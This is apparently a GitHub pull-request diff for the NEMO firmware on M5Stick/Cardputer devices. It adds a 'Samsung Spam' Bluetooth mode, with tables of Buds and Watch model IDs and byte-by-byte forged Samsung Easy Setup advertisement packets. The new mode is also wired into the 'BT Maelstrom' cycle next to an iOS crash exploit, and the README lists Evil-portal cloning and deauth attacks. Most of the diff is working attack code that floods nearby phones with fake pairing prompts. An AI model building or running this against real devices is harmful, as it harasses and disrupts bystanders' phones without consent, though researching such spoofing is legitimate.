Samsung Spam (Easy Setup Spam) as requested in issue #154.

README.md

@@ -12,7 +12,7 @@ NEMO is named after the small, clever and stubborn fish in Finding Nemo. This pr
 
 ## My Changelog
 * Adjusted .github/workflow/compile.yml to compile with the DEAUTH function.
-* Added suport to SONG on StickC Plus and Plus2
+* Added support to SONG on StickC Plus and Plus2
 * Added an "Attack Menu" when seeing details of an Access Point
   - Clone Portal (Creates an Evil portal with the same SSID of the target)
   - Deauth attack (broadcasts deauthentication frames to devices connected to this Access Point)
@@ -117,7 +117,7 @@ arduino-cli compile --fqbn m5stack:esp32:m5stack_cardputer -e --build-property b
 
 ```
 
-- This will create multiple binaries based on partition sketch, you can merge a single binary using `esptool``
+- This will create multiple binaries based on partition sketch, you can merge a single binary using `esptool`
 - Install esptool - `pip install -U esptool`
 
 ```bash
@@ -151,7 +151,7 @@ ls ./build
 
 # This will flash the build output from the build step, it reuses the container image from the previous step.
 # By default this will compile for the M5Cardputer in en-us locale, ./config/.env.M5Cardputer
-./scipts/flash.sh --device=/dev/ttyusb0 
+./scripts/flash.sh --device=/dev/ttyusb0 
 
 # If you passed a different build config make sure to pass it along to the flash script
 ./scipts/flash.sh --device=/dev/ttyusb0 --build-config=./config/.env.M5Cardputer
@@ -178,7 +178,7 @@ Please report bugs via GitHub Issues. These are easier to track than comments on
 
 ## Contributing
 Contributions are welcome. 
-* Pliease look at the GitHub Issues for the project. There are feature suggestions and bugs reported there, and I'd appreciate PRs that address those.
+* Please look at the GitHub Issues for the project. There are feature suggestions and bugs reported there, and I'd appreciate PRs that address those.
 * When submitting a Pull Request, please target the develop branch. The easiest way to do this is to fork ALL branches, or to simply create a "develop" branch in your own fork, then use GitHub to Sync your develop branch.
 * Take note of how certain hardware (like the LED and RTC) are defined and gated in the code and try to stick to those patterns. Also, use the definitions for FGCOLOR, BGCOLOR, TEXT_SIZE* and the DISP alias when outputting things to the built-in display.
 * Feel free to add your github to the contributors array as part of your pull request.

applejuice.h

@@ -241,6 +241,71 @@ DeviceType android_models[] = {
     {0x92ADC9, "Ton Upgrade Netflix"},
 };
 
+inline struct {
+    uint32_t value;
+    const char* name;
+} buds_models[] = {
+    {0xEE7A0C, "Fallback Buds"},
+    {0x9D1700, "Fallback Dots"},
+    {0x39EA48, "Light Purple Buds2"},
+    {0xA7C62C, "Bluish Silver Buds2"},
+    {0x850116, "Black Buds Live"},
+    {0x3D8F41, "Gray & Black Buds2"},
+    {0x3B6D02, "Bluish Chrome Buds2"},
+    {0xAE063C, "Gray Beige Buds2"},
+    {0xB8B905, "Pure White Buds"},
+    {0xEAAA17, "Pure White Buds2"},
+    {0xD30704, "Black Buds"},
+    {0x9DB006, "French Flag Buds"},
+    {0x101F1A, "Dark Purple Buds Live"},
+    {0x859608, "Dark Blue Buds"},
+    {0x8E4503, "Pink Buds"},
+    {0x2C6740, "White & Black Buds2"},
+    {0x3F6718, "Bronze Buds Live"},
+    {0x42C519, "Red Buds Live"},
+    {0xAE073A, "Black & White Buds2"},
+    {0x011716, "Sleek Black Buds2"},
+};
+
+struct WatchModel
+{
+    uint8_t value;
+    const char *name;
+};
+
+inline WatchModel* watch_models = new WatchModel[26] 
+{
+    {0x1A, "Fallback Watch"},
+    {0x01, "White Watch4 Classic 44m"},
+    {0x02, "Black Watch4 Classic 40m"},
+    {0x03, "White Watch4 Classic 40m"},
+    {0x04, "Black Watch4 44mm"},
+    {0x05, "Silver Watch4 44mm"},
+    {0x06, "Green Watch4 44mm"},
+    {0x07, "Black Watch4 40mm"},
+    {0x08, "White Watch4 40mm"},
+    {0x09, "Gold Watch4 40mm"},
+    {0x0A, "French Watch4"},
+    {0x0B, "French Watch4 Classic"},
+    {0x0C, "Fox Watch5 44mm"},
+    {0x11, "Black Watch5 44mm"},
+    {0x12, "Sapphire Watch5 44mm"},
+    {0x13, "Purpleish Watch5 40mm"},
+    {0x14, "Gold Watch5 40mm"},
+    {0x15, "Black Watch5 Pro 45mm"},
+    {0x16, "Gray Watch5 Pro 45mm"},
+    {0x17, "White Watch5 44mm"},
+    {0x18, "White & Black Watch5"},
+    {0x1B, "Black Watch6 Pink 40mm"},
+    {0x1C, "Gold Watch6 Gold 40mm"},
+    {0x1D, "Silver Watch6 Cyan 44mm"},
+    {0x1E, "Black Watch6 Classic 43m"},
+    {0x20, "Green Watch6 Classic 43m"},
+};
+
+
+int samsung_buds_count = (sizeof(buds_models) / sizeof(buds_models[0]));
+
 int android_models_count = (sizeof(android_models) / sizeof(android_models[0]));
 
 BLEAdvertisementData oAdvertisementData = BLEAdvertisementData();

m5stick-nemo.ino

@@ -235,6 +235,7 @@ bool rstOverride = false;   // Reset Button Override. Set to true when navigatin
 bool sourApple = false;     // Internal flag to place AppleJuice into SourApple iOS17 Exploit Mode
 bool swiftPair = false;     // Internal flag to place AppleJuice into Swift Pair random packet Mode
 bool androidPair = false;   // Internal flag to place AppleJuice into Android Pair random packet Mode
+bool samsungSpam = true;   // Internal flag to place AppleJuice into Samsung Spam random packet Mode
 bool maelstrom = false;     // Internal flag to place AppleJuice into Bluetooth Maelstrom mode
 bool portal_active = false; // Internal flag used to ensure NEMO Portal exits cleanly
 bool activeQR = false; 
@@ -1343,6 +1344,7 @@ MENU btmenu[] = {
   { "AppleJuice", 0},
   { "Swift Pair", 1},
   { "Android Spam", 4},
+  { "Samsung Spam", 6},
   { TXT_SA_CRASH, 2},
   { "BT Maelstrom", 3},
 };
@@ -1354,6 +1356,7 @@ void btmenu_setup() {
   swiftPair = false;
   maelstrom = false;
   androidPair = false;
+  samsungSpam = false;
   rstOverride = true;
   drawmenu(btmenu, btmenu_size);
   delay(500); // Prevent switching after menu loads up
@@ -1423,6 +1426,14 @@ void btmenu_loop() {
         isSwitching = true;
         current_proc = 1;
         break;
+
+      case 6:
+        samsungSpam = true;
+        current_proc = 9; // jump straight to appleJuice Advertisement
+        rstOverride = false;
+        isSwitching = true;
+        DISP.print("Samsung Spam");
+        DISP.print(TXT_SEL_EXIT2);
     }
   }
 }
@@ -1473,6 +1484,7 @@ void aj_setup(){
   sourApple = false;
   swiftPair = false;
   maelstrom = false;
+  samsungSpam = false;
   rstOverride = true;
   drawmenu(ajmenu, ajmenu_size);
 }
@@ -1611,7 +1623,7 @@ void aj_adv(){
   // Isolating this to its own process lets us take advantage 
   // of the background stuff easier (menu button, dimmer, etc)
   rstOverride = true;
-  if (sourApple || swiftPair || androidPair || maelstrom){
+  if (sourApple || swiftPair || androidPair || maelstrom || samsungSpam){
     delay(20);   // 20msec delay instead of ajDelay for SourApple attack
     advtime = 0; // bypass ajDelay counter
   }
@@ -1698,6 +1710,52 @@ void aj_adv(){
         Serial.printf("%02x", packet[i]);
       }
       Serial.println("");
+    } else if (samsungSpam) {
+      //Code from https://github.com/Spooks4576/Ghost_ESP/blob/main/src/components/ble_module/ble_module.h
+
+      Serial.print(TXT_AD_SPAM_ADV);
+      uint8_t packet[15];
+      uint8_t i = 0;
+      int randval = random(1, 2);
+
+      if (randval == 1)
+      {
+        uint8_t model = watch_models[rand() % 25].value;
+
+        packet[i++] = 14; // Size
+        packet[i++] = 0xFF; // AD Type (Manufacturer Specific)
+        packet[i++] = 0x75; // Company ID (Samsung Electronics Co. Ltd.)
+        packet[i++] = 0x00; // ...
+        packet[i++] = 0x01;
+        packet[i++] = 0x00;
+        packet[i++] = 0x02;
+        packet[i++] = 0x00;
+        packet[i++] = 0x01;
+        packet[i++] = 0x01;
+        packet[i++] = 0xFF;
+        packet[i++] = 0x00;
+        packet[i++] = 0x00;
+        packet[i++] = 0x43;
+        packet[i++] = (model >> 0x00) & 0xFF; // Watch Model / Color (?)
+
+        oAdvertisementData.addData(std::string((char *)packet, 15));
+      }
+      else 
+      {
+        uint8_t advertisementPacket[] = {
+          0x02, 0x01, 0x18, 0x1B, 0xFF, 0x75, 0x00, 0x42, 0x09, 0x81, 0x02, 0x14,
+          0x15, 0x03, 0x21, 0x01, 0x09, 0xEF, 0x0C, 0x01, 0x47, 0x06, 0x3C, 0x94, 0x8E,
+          0x00, 0x00, 0x00, 0x00, 0xC7, 0x00
+        };
+
+        int randomIndex = rand() % samsung_buds_count;
+        uint32_t value = buds_models[randomIndex].value;
+        advertisementPacket[17] = (value >> 24) & 0xFF;
+        advertisementPacket[18] = (value >> 16) & 0xFF;
+        advertisementPacket[20] = (value >> 8) & 0xFF;
+
+        oAdvertisementData.addData(std::string((char *)advertisementPacket, 31));
+      }
     } else {
       Serial.print(TXT_AJ_ADV);
       if (deviceType >= 18){
@@ -1720,7 +1778,7 @@ void aj_adv(){
 #endif
   }
   if (check_next_press()) {
-    if (sourApple || swiftPair || androidPair || maelstrom){
+    if (sourApple || swiftPair || androidPair || maelstrom || samsungSpam){
       isSwitching = true;
       current_proc = 16;
       drawmenu(btmenu, btmenu_size);
@@ -1732,6 +1790,8 @@ void aj_adv(){
     sourApple = false;
     swiftPair = false;
     maelstrom = false;
+    samsungSpam = false;
+    androidPair = false;
     pAdvertising->stop(); // Bug that keeps advertising in the background. Oops.
     delay(250);
   }
@@ -1868,17 +1928,28 @@ void btmaelstrom_setup(){
 void btmaelstrom_loop(){
   swiftPair = false;
   sourApple = true;
+  androidPair = false;
+  samsungSpam = true;
   aj_adv();
   if (maelstrom){
     swiftPair = true;
     androidPair = false;
     sourApple = false;
+    samsungSpam = false;
     aj_adv();
   }
   if (maelstrom){
     swiftPair = false;
     androidPair = true;
     sourApple = false;
+    samsungSpam = false;
+    aj_adv();
+  }
+  if (maelstrom){
+    swiftPair = false;
+    androidPair = false;
+    sourApple = false;
+    samsungSpam = true;
     aj_adv();
   }
   if (maelstrom){